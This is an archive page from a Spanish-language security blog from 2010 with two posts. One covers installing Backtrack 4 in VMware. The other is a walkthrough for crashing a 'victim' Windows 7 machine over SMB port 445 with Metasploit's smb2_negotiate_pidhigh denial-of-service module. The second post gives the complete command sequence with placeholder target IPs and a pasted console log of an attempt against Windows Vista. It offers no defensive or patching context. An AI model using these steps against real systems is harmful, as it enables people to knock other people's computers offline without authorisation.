Archivo

Posts Tagged ‘hack’

Instalar Backtrack 4 en VMware Workstation

1 abril, 2010 3 comentarios

Aquí tenéis un vídeo tutorial de como instalar Backtrack 4 en VMware Workstation. El problema con el que me encontré cuando hice la instalación, es que una vez ejecutado el SO y antes de lanzar startx, no me aparecía ningún mensaje como en este vídeo tutorial advirtiéndome de que tenia que activar los dispositivos de red con el comando ./etc/init.d/networking start. Con lo cual, una vez lanzado el startx me encontrare que no tenia conexión a Internet. Imagino que la versión de Backtrack utilizada en el vídeo es diferente a la que yo uso. Ya que yo me baje la Backtrack 4 Final Release VMware Image desde aquí y en el vídeo hacen la instalación manual en VMware creo que con esta version de Backtrack 4 que en teoría debería ser la misma.

Aquí os dejo el vídeo.

Artículos relacionados:

La Metralleta de Metasploit

Reventando un windows 7 con Metasploit

VMware Workstation 6.5.1 Build

Reventando un Windows 7 con Metasploit

1 abril, 2010 12 comentarios

Para reventar o colgar un sistema windows 7 Ultimate con metasploit, primero deberemos asegurarnos que tiene el puerto 445/tcp netbios-ssn abierto, si este es el caso, lo demás es coser y cantar.

En la consola de metasploit, escribiremos el comando para usar el smb_negotiate_pidhigh :

msf> use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh

A continuación determinamos la IP de la victima con el comando set RHOST “victima ip” . ( en este caso utilizaremos una ip ficticia que sera 192.168.0.5 )

msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.0.5

Despues le indicamos cual es el puerto que vamos a utilizar para el ataque, utilizando el comando set RPORT en este caso sera el 445

msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445

Y por ultimo lanzamos el ataque con el comando run y a esperar a que se cuelgue el sistema.

msf auxiliary(smb2_negotiate_pidhigh) > run

Aquí os dejo un vídeo donde se ejecutan todos los comandos paso a paso.

Aqui os dejo el resultado de un ataque frustrado contra un Windows Vista Home Premium Service Pack 1

msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.35
RHOST => 192.168.1.35
msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
RPORT => 445
msf auxiliary(smb2_negotiate_pidhigh) > run

[*] Sending request and waiting for a reply…
[*] Response received: “000000\236\376SMB@0000000000000000000100010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A00010002020000\37621\321}\256\211\216D\226Ki03A3452601000000000001000000010000000100\320\252Q{\241\321\31201\276/K\361P\276\31201\200003600 LM `340606+0601050502\24022020\240160\f06\n+06010401\20270202\n”
[*] Auxiliary module execution completed
msf auxiliary(smb2_negotiate_pidhigh) >

Artículos relacionados:

La Metralleta de Metasploit

Categorías:Seguridad Etiquetas: , , ,